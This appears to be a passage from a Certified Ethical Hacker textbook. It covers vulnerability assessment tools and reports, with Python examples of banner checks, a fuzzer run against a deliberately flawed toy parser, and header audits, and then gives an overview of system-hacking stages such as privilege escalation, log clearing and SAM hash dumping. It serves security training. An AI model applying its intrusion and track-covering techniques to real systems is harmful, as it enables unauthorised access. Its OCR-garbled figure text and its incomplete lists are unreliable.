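            continue                      # unknown protocol: nothing to test
        regex, fixed = VERSION_PARSERS[proto]
        m = regex.search(banner)
        if not m:
            continue
        product = fixed or m.group(1)
        version = m.group(1) if fixed else m.group(2)
        services.append(Service(host, port, proto, product, parse_version(version)))
    return services


def select_checks(services: List[Service]) -> List[Check]:
    """Step 3: only checks for protocols present in the inventory are scheduled."""
    present = {s.protocol for s in services}
    return [c for c in CHECKS if c.protocol in present]


def run_scan(banners):
    services = build_inventory(banners)
    checks = select_checks(services)
    findings = []
    for s in services:
        for c in checks:
            if (c.protocol == s.protocol and c.product.lower() == s.product.lower()
                    and s.version < c.fixed_in):
                findings.append((s.host, s.port, c.vuln_id))
    return services, checks, findings


# Constructed banners standing in for what a banner grabber would return.
SAMPLE_BANNERS = [
    ("10.0.0.5", 80,   "HTTP/1.1 200 OK\r\nServer: Apache/2.4.29 (Ubuntu)\r\n"),
    ("10.0.0.5", 25,   "220 mail.example.test ESMTP Postfix 3.1.0"),
    ("10.0.0.5", 22,   "SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3"),
    ("10.0.0.7", 3306, "5.7.22-log mysql_native_password"),
    ("10.0.0.9", 80,   "HTTP/1.1 200 OK\r\nServer: Apache/2.4.46 (Unix)\r\n"),
]

if __name__ == "__main__":
    _, scheduled, found = run_scan(SAMPLE_BANNERS)
    print("checks scheduled:", [c.vuln_id for c in scheduled])   # the ftp check is skipped
    for host, port, vid in found:
        print(f"{host}:{port} {vid}")
```

The point of the inference step is visible in the output: no FTP service was found, so VULN-004 is never scheduled, and the second Apache host is inventoried but produces no finding because its version is at or above the threshold.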
Types of Vulnerability Assessment Tools

There are six types of vulnerability assessment tools: host-based vulnerability assessment tools, depth assessment tools, application-layer vulnerability assessment tools, scope assessment tools, active and passive tools, and location and data-examination tools.
Host-Based Vulnerability Assessment Tools

The host-based scanning tools are appropriate for servers that run various applications, such as the Web, critical files, databases, directories, and remote accesses. These host-based scanners can detect high levels of vulnerabilities and provide required information about the fixes (patches). A host-based vulnerability assessment tool identifies the OS running on a particular host computer and tests it for known deficiencies. It also searches for common applications and services.
Depth Assessment Tools

Depth assessment tools are used to discover and identify previously unknown vulnerabilities in a system. Generally, tools such as fuzzers, which provide arbitrary input to a system's interface, are used to identify vulnerabilities to an unstable depth. Many of these tools use a set of vulnerability signatures to test whether a product is resistant to a known vulnerability or not.
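An added example, not from the original text or any named product: a mutation fuzzer of the kind depth assessment tools use, driven against a constructed toy parser whose flaw (trusting its own length byte) the fuzzer knows nothing about. The parser's documented rejection path (ValueError) is ignored; any other exception is recorded as a crash with one reproducer per distinct failure. The record format, the parser and the seed input are all constructed for illustration.

```python
"""Mutation fuzzer of the kind depth assessment tools use (added example, not
code from the original text or any product). The target below is a constructed
toy parser with a flaw the fuzzer does not know about: it trusts the length byte.
"""
import random
from typing import Callable, Dict, Tuple


def parse_record(data: bytes) -> dict:
    """Constructed target: [len][payload, len bytes][checksum].
    Deliberate flaw for the demo: the length byte is trusted."""
    if len(data) < 2:
        raise ValueError("record too short")           # documented rejection
    n = data[0]
    payload = data[1:1 + n]
    checksum = data[1 + n]                             # IndexError when n lies
    if sum(payload) & 0xFF != checksum:
        raise ValueError("bad checksum")               # documented rejection
    return {"length": n, "payload": bytes(payload)}


# A valid seed record: length 5, payload "hello", checksum = sum(b"hello") & 0xFF = 20
SEED = bytes([5]) + b"hello" + bytes([20])

EXPECTED_ERRORS = (ValueError,)   # the parser's own input-validation path


def mutate(rng: random.Random, data: bytes) -> bytes:
    """One random structural or byte-level mutation of a known-good input."""
    buf = bytearray(data)
    op = rng.choice(["flip", "truncate", "insert", "length"])
    if op == "flip":
        i = rng.randrange(len(buf))
        buf[i] ^= 1 << rng.randrange(8)
    elif op == "truncate" and len(buf) > 1:
        del buf[rng.randrange(1, len(buf)):]
    elif op == "insert":
        buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    else:
        buf[0] = rng.randrange(256)                     # attack the length field
    return bytes(buf)


def fuzz(target: Callable[[bytes], object], seed: bytes,
         iterations: int = 2000, rng_seed: int = 1) -> Dict[Tuple[str, str], bytes]:
    """Feed mutated inputs to target; keep one reproducer per distinct crash.
    Expected validation errors are not crashes; anything else is a finding."""
    rng = random.Random(rng_seed)          # fixed seed so runs are reproducible
    crashes: Dict[Tuple[str, str], bytes] = {}
    for _ in range(iterations):
        case = mutate(rng, seed)
        try:
            target(case)
        except EXPECTED_ERRORS:
            continue
        except Exception as exc:           # unexpected exception = crash
            crashes.setdefault((type(exc).__name__, str(exc)), case)
    return crashes


if __name__ == "__main__":
    for (kind, msg), case in fuzz(parse_record, SEED).items():
        print(f"{kind}: {msg} <- {case.hex()}")
```

The fixed RNG seed matters in practice: a crash that cannot be reproduced cannot be turned into a finding, so a real depth tool records the seed or the exact input alongside the crash.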
Application-Layer Vulnerability Assessment Tools

Application-layer vulnerability assessment tools are designed to serve the needs of all kinds of operating system types and applications. Various resources pose a variety of security threats and are identified by the tools designed for that purpose. Observing system vulnerabilities through the Internet using an external router, firewall, or web server is called an external vulnerability assessment. These vulnerabilities could be external DoS/DDoS threats, network data interception, or other issues. The analyst performs a vulnerability assessment and notes vulnerable resources. The network vulnerability information is regularly updated into the tools. Application-layer vulnerability assessment tools are directed towards web servers or databases.
Scope Assessment Tools

Scope assessment tools provide an assessment of the security by testing vulnerabilities in the applications and operating system. These tools provide standard controls and a reporting interface that allows the user to select a suitable scan. These tools generate a standard report based on the information found. Some assessment tools are designed to test a specific application or application type for vulnerability.
Active and Passive Tools

Active scanners perform vulnerability checks on the network functions that consume resources on the network. The main advantage of the active scanner is that the system administrator or IT manager has good control of the timing and the parameters of vulnerability scans. This scanner cannot be used for critical operating systems because it uses system resources that affect the processing of other tasks.

Passive scanners are those that do not considerably affect system resources, as they only observe system data and perform data processing on a separate analysis machine. A passive scanner first receives system data that provide complete information on the processes that are running and then assesses that data against a set of rules.

Location and Data Examination Tools
Choosing a Vulnerability Assessment Tool
Vendor-designed vulnerability assessment tools can be used to test a host or application for vulnerabilities. There are several available vulnerability assessment tools that include port scanners, vulnerability scanners, and OS vulnerability assessment scanners. Organizations must choose appropriate tools based on their test requirements.

Choose the tools that best satisfy the following requirements:

- Tools must be capable of testing anywhere from dozens to 30,000 different vulnerabilities, depending on the product
- The selected tool should have a sound database of vulnerabilities and frequently updated attack signatures
- Pick a tool that matches the environment and expertise
- Make sure to regularly update the scan engine to ensure the tool is aware of the latest known vulnerabilities
- Verify that the chosen vulnerability assessment tool has accurate network mapping, application mapping, and penetration tests. Not all tools can find the protocols running and analyze a network's performance.
- Check whether the tool has different levels of penetration to stop lockups
- The maintenance costs of tools can be offset by effectively using them
- Ensure that the vulnerability assessment tool can run its scans quickly and accurately
- Ensure that the tool can perform scans using multiple protocols
- Verify that the tool can understand and analyze the network topology to perform the assessment
- Bandwidth limitations are a major concern when dealing with large networks. Ensure the vulnerability assessment tool has high bandwidth allocation
- Ensure that the vulnerability assessment tool possesses excellent query-throttling features
- Ensure that the tool can also assess fragile systems and non-traditional assets
Criteria for Choosing a Vulnerability Assessment Tool

- Types of vulnerabilities being assessed
- Testing capability of scanning
- Ability to provide accurate reports
- Efficient and accurate scanning
- Functionality for writing its own tests
- Test run scheduling
Best Practices for Selecting Vulnerability Assessment Tools

- Ensure that it does not damage your network or system while running tools
- Understand the functionality before beginning, and decide on the information that needs to be collected
- Decide the source location of the scan, taking into consideration the information that needs to be collected
- Enable logging every time a computer is scanned
- Users should scan their systems for vulnerabilities frequently
Vulnerability Assessment Tools
An attacker performs vulnerability scanning to identify security loopholes in the target network that they can exploit to launch attacks. Security analysts can use vulnerability assessment tools to identify weaknesses present in the organization's security posture and remediate the identified vulnerabilities before an attacker exploits them.

Network vulnerability scanners help to analyze and identify vulnerabilities in the target network or network resources by using vulnerability assessment and network auditing. These tools also assist in overcoming weaknesses in the network by suggesting various remediation techniques. The following are some of the most effective vulnerability assessment tools:

Qualys Vulnerability Management
Source: https://www.qualys.com

Qualys VM is a cloud-based service that gives immediate, global visibility into where IT systems might be vulnerable to the latest Internet threats and how to protect them. It helps to continuously identify threats and monitor unexpected changes in a network before they turn into breaches.

Features:

- Agent-based detection: Also works with the Qualys Cloud Agents, extending its network coverage to unscannable assets.
- Constant monitoring and alerts: When VM is paired with Continuous Monitoring (CM), InfoSec teams are proactively alerted about potential threats, so problems can be tackled before they turn into breaches.
- Comprehensive coverage and visibility: Continuously scans and identifies vulnerabilities for protecting IT assets on-premises, in the cloud, and at mobile endpoints. Its executive dashboard displays an overview of the security posture and gives access to remediation details. VM generates custom, role-based reports for multiple stakeholders, including automatic security documentation for compliance auditors.
- VM for the perimeter-less world: As enterprises adopt cloud computing, mobility, and other disruptive technologies for digital transformation, Qualys VM offers next-generation vulnerability management for these hybrid IT environments whose traditional boundaries have been blurred.
- Discover forgotten devices and organize the host assets: Qualys can help quickly determine what is running in different parts of the network, from the perimeter and corporate network to virtualized machines and cloud services. It can also identify unexpected access points, web servers, and other devices that can expose the network to attack.
- Scan systems everywhere, for vulnerabilities: Scan anywhere from the same console, accurately and efficiently, including the perimeter, the internal network, and cloud environments.
- Identify and prioritize risks: Qualys, using trend analysis, Zero-Day, and Patch impact predictions, can identify the highest business risks.
- Remediate vulnerabilities: Qualys's ability to track vulnerability data across hosts and time produces interactive reports that provide a better understanding of the security of the network.

Figure 5.6: Vulnerability scanning using Qualys Vulnerability Management
Nessus Professional

Source: https://www.tenable.com

Nessus Professional is an assessment solution for identifying vulnerabilities, configuration issues, and malware that attackers use to penetrate networks. It performs vulnerability, configuration, and compliance assessment. It supports various technologies such as operating systems, network devices, hypervisors, databases, tablets and phones, web servers, and critical infrastructure.

Nessus is the vulnerability scanning platform for auditors and security analysts. Users can schedule scans across multiple scanners, and use wizards to easily and quickly create policies, schedule scans, and send results via email.

Features:

- High-speed asset discovery
- Vulnerability assessment
- Malware and botnet detection
- Configuration and compliance auditing
- Scanning and auditing of virtualized and cloud platforms

Figure 5.7: Vulnerability scanning using Nessus
GFI LanGuard

Source: https://www.gfi.com

GFI LanGuard scans for, detects, assesses, and rectifies security vulnerabilities in a network and its connected devices. This is done with minimal administrative effort. It scans the operating systems, virtual environments, and installed applications through vulnerability check databases. It enables analysis of the state of network security, identifies risks, and offers solutions before the system can be compromised.

Features:

- Patch management for operating systems and third-party applications
- Vulnerability assessment
- A web console for reporting
- Track latest vulnerabilities and missing updates
- Integration with security applications
- Network device vulnerability checks
- Network and software auditing
- Support for virtual environments

Figure 5.8: Vulnerability scanning using GFI LanGuard

OpenVAS
Source: http://www.openvas.org

OpenVAS is a framework of several services and tools that offer a comprehensive and powerful vulnerability scanning and vulnerability management solution. The framework is part of Greenbone Network's commercial vulnerability management solution, developments from which have been contributed to the open-source community since 2008. The actual security scanner is accompanied by a regularly updated feed of Network Vulnerability Tests (NVTs), over 50,000 in total.

Figure 5.9: Vulnerability scanning using OpenVAS
Nikto

Source: https://cirt.net

Nikto is an Open Source (GPL) web server scanner that performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files or programs, checks for outdated versions of over 1250 servers, and checks for version-specific problems on over 270 servers. It also looks at server configuration items such as the presence of multiple index files and the HTTP server options, and will attempt to identify installed web servers and software.

Features:

- SSL support (Unix with OpenSSL, or maybe Windows with ActiveState's Perl/NetSSL)
- Full HTTP proxy support
- Checks for outdated server components
- Saves reports in plain text, XML, HTML, NBE or CSV
- A template engine to easily customize reports
- Scans multiple ports on a server, or multiple servers via input file
- LibWhisker's IDS encoding techniques
- Identifies installed software via headers, favicons, and files
- Host authentication with Basic and NTLM
- Subdomain guessing
- Apache and cgiwrap username enumeration
- Scan tuning to include or exclude entire classes of vulnerability checks
- Guesses credentials for authorization realms (including many default ID and password combinations)
Figure 5.10: Screenshot of Nikto. The captured scan of www.certifiedhacker.com on target port 80 started 2019-11-19 20:41:24 and reported, among other items: the anti-clickjacking X-Frame-Options header is not present; the X-XSS-Protection header is not defined, and this header can hint to the user agent to protect against some forms of XSS; the X-Content-Type-Options header is not set, which could allow the user agent to render the content of the site in a different fashion to the MIME type; and a potentially interesting archive, /certifiedhacker.zip. The scan terminated after the error limit (20) was reached for the host, with 19 error(s) and 4 item(s) reported on the remote host (end time 2019-11-19 20:51:15, 591 seconds, 1 host tested).
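The header checks Nikto reports in the screenshot above, recreated as an added example in Python (not Nikto's code): parse a raw HTTP response, flag the absence of X-Frame-Options, X-XSS-Protection and X-Content-Type-Options with Nikto's wording, and note software disclosure in the Server header. Both responses are constructed; the hardened one shows the same function returning no findings.

```python
"""Nikto-style header checks (added example; not Nikto's code). Parses a raw HTTP
response and reports the missing-header items Nikto printed above plus software
disclosure in the Server header. Both responses below are constructed."""
from typing import Dict, List, Tuple

# Message text mirrors Nikto's wording for these checks.
MISSING_HEADER_MESSAGES = {
    "x-frame-options": "The anti-clickjacking X-Frame-Options header is not present.",
    "x-xss-protection": ("The X-XSS-Protection header is not defined. This header can hint "
                         "to the user agent to protect against some forms of XSS."),
    "x-content-type-options": ("The X-Content-Type-Options header is not set. This could allow "
                               "the user agent to render the content of the site in a different "
                               "fashion to the MIME type."),
}


def parse_response(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw response into status line, headers (lower-cased names) and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def audit_headers(raw: str) -> List[str]:
    """Return one finding string per problem, in the order Nikto prints them."""
    _, headers, _ = parse_response(raw)
    findings: List[str] = []
    server = headers.get("server", "")
    if "/" in server:   # product/version disclosed, e.g. Apache/2.4.29
        findings.append(f"Server header identifies installed software: {server}")
    for name, message in MISSING_HEADER_MESSAGES.items():
        if name not in headers:
            findings.append(message)
    return findings


# Constructed responses, not captured from any real host.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>hello</body></html>"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"                    # version stripped
    "Content-Type: text/html\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-XSS-Protection: 0\r\n"               # Nikto checks presence only
    "\r\n"
    "<html><body>hello</body></html>"
)

if __name__ == "__main__":
    for line in audit_headers(WEAK_RESPONSE):
        print("+", line)
    print("hardened findings:", audit_headers(HARDENED_RESPONSE))
```

A presence check is all Nikto does for these headers; whether the value is sensible (for example, a Content-Security-Policy that actually restricts framing) is a separate, manual review step.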
Listed below are some of the additional vulnerability assessment tools:

- Qualys FreeScan (https://freescan.qualys.com)
- Acunetix Web Vulnerability Scanner (https://www.acunetix.com)
- Nexpose (https://www.rapid7.com)
- Network Security Scanner (https://www.beyondtrust.com)
- SAINT (https://www.saintcorporation.com)
- Microsoft Baseline Security Analyzer (MBSA) (https://www.microsoft.com)
- beSECURE (AVDS) (https://www.beyondsecurity.com)
- Core Impact Pro (https://www.coresecurity.com)
- N-Stalker Web Application Security Scanner (https://www.nstalker.com)
- ManageEngine Vulnerability Manager Plus (https://www.manageengine.com)
Vulnerability Assessment Tools for Mobile

Figure 5.11: Vulners Scanner, critical risk score

Figure 5.12: Vulners Scanner, medium risk score
SecurityMetrics Mobile

Source: https://www.securitymetrics.com

SecurityMetrics Mobile is a mobile defense tool that helps to identify mobile device vulnerabilities to protect customers' sensitive data. It helps to avoid threats that originate from mobile malware, device theft, Wi-Fi network connectivity, data entry, personal and business use, unwarranted app privileges, data and device storage, account data access, Bluetooth, Infrared (IR), Near-field communication (NFC), and SIM and SD cards.

SecurityMetrics MobileScan complies with PCI SSC (Payment Card Industry Security Standards Council) guidelines to prevent mobile data theft. On completion of a scan, the report generated comprises a total risk score, a summary of discovered vulnerabilities, and recommendations on how to resolve threats.

Figure 5.13: SecurityMetrics Mobile result
Vulnerability Assessment Reports
In the vulnerability assessment process, once all the phases are completed, the security team will review the results and process the information to prepare the final report. In this phase, the security team will try to disclose any identified vulnerabilities, document any variations and findings, and include all these in the final report along with remediation steps to mitigate the identified risks.

The vulnerability assessment report discloses the risks that are detected through scanning the network. Tools such as Nessus, GFI LanGuard, and Qualys Vulnerability Management are used for vulnerability assessment. These tools provide a comprehensive assessment report in a specified format. The report alerts the organization to possible attacks and suggests countermeasures.

The report provides details of all the possible vulnerabilities with regard to the company's security policies. The vulnerabilities are categorized based on severity into three levels: High, Medium, and Low risk.

High-risk vulnerabilities are those that might allow unauthorized access to the network. These vulnerabilities must be rectified immediately before the network is compromised. The report describes different kinds of attacks that are possible given the organization's set of operating systems, network components, and protocols.
The vulnerability assessment report must include, but is not limited to, the following points:

- The name of the vulnerability and its date of discovery
- The vulnerability's mapped CVE ID
- The vulnerability's score (CVSS), as recorded in Common Vulnerabilities and Exposures (CVE) databases
- A detailed description of the vulnerability
- The impact of the vulnerability
- Details regarding the affected systems
- Details regarding the process needed to correct the vulnerability, including information on patches, configuration fixes, and ports to be blocked
- A proof of concept (PoC) of the vulnerability for the system (if possible)

Figure 5.25: Components of a vulnerability assessment report (Scan Information, Target Information, Results)
Analyzing Vulnerability Scanning Report

A vulnerability assessment report provides detailed information on the vulnerabilities found in the computing environment. The report helps organizations identify the security posture of the computing systems (such as web servers, firewalls, routers, email, and file services) and provide solutions to reduce system failures. An ethical hacker must be careful in analyzing the vulnerability assessment reports to avoid false positives.

The assessment report helps organizations to take mitigation steps to proactively avoid risk by identifying, tracking, and eliminating security vulnerabilities.

Vulnerability reports cover the following elements:

- Scan information: Provides information such as the name of the scanning tool, its version, and the network ports to be scanned
- Target information: Contains information about the target system's name and address
- Results: Gives the date of the test and includes the following:
  - Host: Shows the name and address of the host
  - Services: Defines the network services by their names and ports
  - Classification: Allows the system administrator to obtain additional information about the scan, such as its origin
  - Assessment: Provides information regarding the scanner's assessment of discovered vulnerabilities
Vulnerability assessment reports are classified into two types:

- Security Vulnerability Reports
- Security Vulnerability Summaries

Security Vulnerability Report

This is a combined report for all the scanned devices and servers in the organization's network. The security vulnerability report includes the following details:

- Newly found vulnerabilities
- Open ports and detected services
- Suggestions for remediation
- Links to patches

A sample security vulnerability report is as follows: (sample report showing Detailed Results and Exploits available)

Security Vulnerability Summary

This report is produced for every device or server after scanning. It gives a summary of the scan result that includes the following elements:

- Current security flaws
- Newly detected security vulnerabilities
- Resolved vulnerabilities
- Categories of vulnerabilities
- The severity of vulnerabilities
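As an added example, not part of the original text, the following Python builds both report types from constructed scanner output: the combined Security Vulnerability Report (new vulnerabilities, open ports and detected services) and a per-device Security Vulnerability Summary (current flaws, newly detected, resolved, categories, severity). The finding IDs (VULN-xxx) are hypothetical placeholders rather than CVE numbers, the CVSS-to-High/Medium/Low cut-offs are an assumption (the text names the three levels but gives no thresholds), and findings resting on banner evidence alone are flagged for manual verification, which is the false-positive caveat from the analysis section above.

```python
"""Vulnerability report and per-device summary from two scans (added example,
not EC-Council code). All scan data is constructed; VULN-xxx IDs are placeholders,
not CVE entries. Severity thresholds are an assumption, not from the text."""
from collections import Counter
from typing import Dict, List

# Constructed scanner output. "evidence" records how the scanner concluded the
# finding: "banner" (version string only) or "active" (a check actually ran).
PREVIOUS_SCAN = [
    {"id": "VULN-101", "host": "10.0.0.5", "port": 80,   "service": "http",
     "category": "Web server", "cvss": 7.5, "evidence": "banner"},
    {"id": "VULN-102", "host": "10.0.0.5", "port": 443,  "service": "https",
     "category": "TLS", "cvss": 5.0, "evidence": "active"},
    {"id": "VULN-201", "host": "10.0.0.7", "port": 3306, "service": "mysql",
     "category": "Database", "cvss": 9.0, "evidence": "active"},
]
CURRENT_SCAN = [
    {"id": "VULN-101", "host": "10.0.0.5", "port": 80,   "service": "http",
     "category": "Web server", "cvss": 7.5, "evidence": "banner"},
    {"id": "VULN-103", "host": "10.0.0.5", "port": 22,   "service": "ssh",
     "category": "Remote access", "cvss": 2.6, "evidence": "banner"},
    {"id": "VULN-202", "host": "10.0.0.7", "port": 3306, "service": "mysql",
     "category": "Database", "cvss": 4.3, "evidence": "active"},
]


def severity(cvss: float) -> str:
    """Map a CVSS score to the report's three levels.
    Assumed cut-offs (NVD-style v2 ranges); the text gives none."""
    if cvss >= 7.0:
        return "High"
    if cvss >= 4.0:
        return "Medium"
    return "Low"


def finding_key(f: dict):
    """A finding is the same finding across scans if host, port and ID match."""
    return (f["host"], f["port"], f["id"])


def device_summary(host: str, current: List[dict], previous: List[dict]) -> Dict[str, object]:
    """Security Vulnerability Summary for one device: current flaws, newly
    detected, resolved, categories, severity, plus items needing manual checks."""
    cur = {finding_key(f): f for f in current if f["host"] == host}
    prev = {finding_key(f): f for f in previous if f["host"] == host}
    return {
        "host": host,
        "current_flaws": len(cur),
        "newly_detected": sorted(f["id"] for k, f in cur.items() if k not in prev),
        "resolved": sorted(f["id"] for k, f in prev.items() if k not in cur),
        "by_severity": dict(Counter(severity(f["cvss"]) for f in cur.values())),
        "by_category": dict(Counter(f["category"] for f in cur.values())),
        # banner-only evidence is where false positives come from; verify by hand
        "needs_verification": sorted(f["id"] for f in cur.values() if f["evidence"] == "banner"),
    }


def combined_report(current: List[dict], previous: List[dict]) -> Dict[str, object]:
    """Security Vulnerability Report across all devices: new vulnerabilities,
    open ports and detected services, and one summary per device."""
    known = {finding_key(p) for p in previous}
    open_services: Dict[str, set] = {}
    for f in current:
        open_services.setdefault(f["host"], set()).add((f["port"], f["service"]))
    hosts = sorted({f["host"] for f in current} | {f["host"] for f in previous})
    return {
        "new_vulnerabilities": sorted(f["id"] for f in current if finding_key(f) not in known),
        "open_ports": {h: sorted(s) for h, s in open_services.items()},
        "devices": [device_summary(h, current, previous) for h in hosts],
    }


if __name__ == "__main__":
    report = combined_report(CURRENT_SCAN, PREVIOUS_SCAN)
    print("new:", report["new_vulnerabilities"])
    for dev in report["devices"]:
        print(dev["host"], dev["by_severity"], "verify:", dev["needs_verification"])
```

Diffing against the previous scan is what turns a list of plugin hits into the "newly detected" and "resolved" lines the summary calls for; a finding that disappears without a change ticket is as worth investigating as a new one.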
Module Summary

This module discussed vulnerability research, vulnerability assessment, and the vulnerability-management life cycle. It also discussed the CVSS vulnerability scoring system and databases, and various types of vulnerabilities and vulnerability assessment techniques. It described various vulnerability assessment solutions along with their characteristics, and described various vulnerability assessment tools that are used to test a host or application for vulnerabilities, along with the criteria and best practices for selecting the tool. Finally, this module ended with a detailed discussion on how to analyze a vulnerability assessment report and how it discloses the risks detected after scanning a network.

The next module will show how attackers, as well as ethical hackers and pen testers, attempt system hacking based on the information collected about a target in the footprinting, scanning, enumeration, and vulnerability analysis phases.
Certified Ethical Hacker

Module 06: System Hacking
Module Objectives

System hacking is one of the most important, and sometimes the ultimate, goal of an attacker. The attacker acquires information through techniques such as footprinting, scanning, enumeration, and vulnerability analysis and then uses this information to hack the target system. This module will focus on the tools and techniques used by an attacker to hack the target system.

The module begins with an overview of the hacking methodology. Next, it discusses in detail the various hacking stages, such as gaining and maintaining access and clearing logs.

At the end of this module, you will be able to do the following:

- Describe the Certified Ethical Hacker hacking methodology
- Explain the different techniques to gain access to a system
- Apply privilege escalation techniques
- Explain different techniques to gain and maintain remote access to a system
- Describe different types of rootkits
- Explain steganography and steganalysis techniques
- Apply different techniques to hide the evidence of compromise
- Apply various system hacking countermeasures
System Hacking Concepts
An attacker engages in system hacking attempts using information collected in the earlier footprinting, scanning, enumeration, and vulnerability analysis phases. The following is an overview of these phases and the information collected so far.

We have already discussed the following in our previous modules:

Footprinting Module: Footprinting is the process of accumulating data about a specific network environment. In the footprinting phase, the attacker creates a profile of the target organization and obtains information such as its IP address range, namespace, and employees. Footprinting facilitates the process of system hacking by revealing its vulnerabilities. For example, the organization's website may provide employee bios or a personnel directory, which the hacker can use for social engineering purposes. Conducting a Whois query on the web can provide information about the associated networks and domain names related to a specific organization.

Scanning Module: Scanning is a procedure used for identifying active hosts, open ports, and unnecessary services enabled on particular hosts. Attackers use different types of scanning methods for host discovery, port and service discovery, operating system (OS) discovery, and evading endpoint security devices such as intrusion detection systems (IDSs) and firewalls. These techniques help attackers identify possible vulnerabilities. Scanning procedures such as port scanning and ping sweeps return information about the services offered by the live hosts that are active on the Internet, and their IP addresses.

Enumeration Module: Enumeration is a method of intrusive probing, through which attackers gather information such as network user lists, routing tables, security flaws, shared resources, and Simple Network Management Protocol (SNMP) data. This is of significance, because the attacker ranges over the target territory to glean information about the network, users, groups, applications, and banners.
Copyright
CEH Hacking
Methodology
(CHM)
Y= rootprinting System
Hacking
(ining
Recess
Y — sansing
Y= Emmeration
| Velnerabity
ar
Clearing
Loge
CEHHacking (CHM)
Methodology
Attackersfollow a certain methodology They
to hacka system. first obtaininformationduring
thefootprinting,scanning, enumeration,andvulnerability
analysisphases, whichtheythenuse
to exploit
the targetsystem.
The figure between stepsi n the CEH hacking
showsthe steps and flow mechanisms
methodology
(CHM).
VY reotprinting System
Hacking
Cenching
Passwords
Y
Escalating
Privileges
Access
‘Maintaining
Executing
Applications
isingles
‘Vulnerability
Analysis Clearing
Loge
Tacks
Covering
Figure6.1:
CEHhacking
methodology
Module
Page6 S48
tical
Making
and by CountermensoresCopyright©
Comet
There are four steps in the CHM:

Escalating Privileges

After gaining access, attackers then escalate their privileges to administrative levels to perform a protected operation. Attackers exploit vulnerabilities that exist in OSs and software applications to escalate privileges.

Maintaining Access

After successfully gaining access and escalating privileges to the target system, attackers ensure that high levels of access are maintained to perform malicious activities such as executing applications and hiding, stealing, or tampering with sensitive system files.

Clearing Logs

To maintain future system access, attackers attempt to avoid recognition by legitimate system users. To remain undetected, attackers wipe out the entries corresponding to their activities in the system logs, thus avoiding detection by users.
System Hacking Goals

Every criminal has a certain goal that they intend to achieve. Likewise, attackers can have certain goals for performing system attacks. The following are some examples of the goals of system attackers. The following diagram shows these goals at different hacking stages and the techniques used to achieve them.

(Table: Hacking Stage, Goal, Technique/Exploit Used, for the stages Gaining Access, Escalating Privileges, Executing Applications, Hiding Files, and Covering Tracks. The Gaining Access row reads: to bypass access controls to gain access to the system; password cracking, vulnerability exploitation, social engineering.)
Gaining Access

In system hacking, the attacker first tries to gain access to a target system using information obtained and loopholes found in the access control mechanism of the system. Once the attacker succeeds in gaining access to the system, they can freely perform various malicious activities such as stealing sensitive data, implementing a sniffer to capture network traffic, and infecting the system with malware. The attacker can use techniques such as password cracking, vulnerability exploitation, and social engineering tactics to gain access to the target system.

Escalating Privileges

After gaining access to a system using a low-privileged normal user account, the attacker may then try to escalate their privileges to administrator level to perform protected system operations, so that they can proceed to the next level of the system hacking phase, which is the execution of applications. The attacker exploits known system vulnerabilities to escalate user privileges.

Executing Applications

Once the attacker has administrator privileges, they can attempt to install malicious programs such as Trojans, backdoors, rootkits, and keyloggers, which grant them remote system access and enable them to remotely execute malicious code. Installing rootkits allows the attacker to gain access at the OS level to perform malicious activities. To maintain access for later use, they may even install backdoors.

Hiding Files

Attackers use rootkits and steganography techniques to attempt to hide the malicious files they install on the system, and thus their activities.

Covering Tracks

To remain undetected, it is important for the attackers to erase from the system all evidence of security compromise. To achieve this, they might modify or delete logs in the system using certain log-wiping utilities, thus removing all evidence of their presence.
Gaining Access

As discussed earlier, CHM involves various steps attackers follow to hack systems. The following sections discuss these steps in greater detail. The first step, which is the gaining of access, involves the use of various techniques that attackers employ to gain access to the target system. These techniques include cracking passwords, exploiting buffer overflows, and identifying vulnerabilities.
Cracking Passwords

Microsoft Authentication
When users log in to a Windows computer, a series of steps is performed for user authentication. The Windows OS authenticates its users with the help of three mechanisms (protocols) provided by Microsoft.

Security Accounts Manager (SAM) Database

Windows uses the Security Accounts Manager (SAM) database or Active Directory database to manage user accounts and passwords in hashed format (a one-way hash). The system does not store the passwords in plaintext format but in a hashed format, to protect them from attacks. The system implements the SAM database as a registry file, and the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file. As this file is protected by a filesystem lock, this provides some measure of security for the storage of passwords.

Because the system locks the SAM file with an exclusive filesystem lock, a user cannot copy or move it while Windows is running. It is not possible to copy the SAM file to another location in the case of online attacks. The lock does not release until the system throws a blue screen exception, or the OS has shut down. However, to make the password hashes available for offline brute-force attacks, attackers can dump the on-disk contents of the SAM file using various techniques. The SAM file uses a SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes.

Even if hackers use subterfuge techniques to discover the contents, the encrypted keys with a one-way hash make it difficult to hack. In addition, some versions have a secondary key, which makes the encryption specific to that copy of the OS.
▪ NTLM Authentication

NT LAN Manager (NTLM) is the older default authentication scheme of Windows; it performs authentication using a challenge/response strategy. Because it does not rely on any official protocol specification, there is no guarantee that it works effectively in every situation; it has, however, been used successfully in many Windows installations. NTLM authentication consists of two protocols: the NTLM authentication protocol and the LAN Manager (LM) authentication protocol. These protocols use different hash methodologies to store users' passwords in the SAM database.
▪ Kerberos Authentication

Kerberos is a network authentication protocol that provides strong authentication for client/server applications through secret-key cryptography. The protocol provides mutual authentication, in that both the server and the user verify each other's identity. Messages sent through the Kerberos protocol are protected against replay attacks and eavesdropping.

Kerberos employs the Key Distribution Center (KDC), which is a trusted third party. The KDC logically consists of two distinct parts: an authentication server (AS) and a ticket-granting server (TGS). Kerberos uses "tickets" to prove a user's identity.

Microsoft has upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications than NTLM.

Figure 6.3: Screenshot of Windows authentication (the "Enter network credentials" dialog, with the "Remember my credentials" option and the error "The user name or password is incorrect")
How Are Hashed Passwords Stored in the Windows SAM?

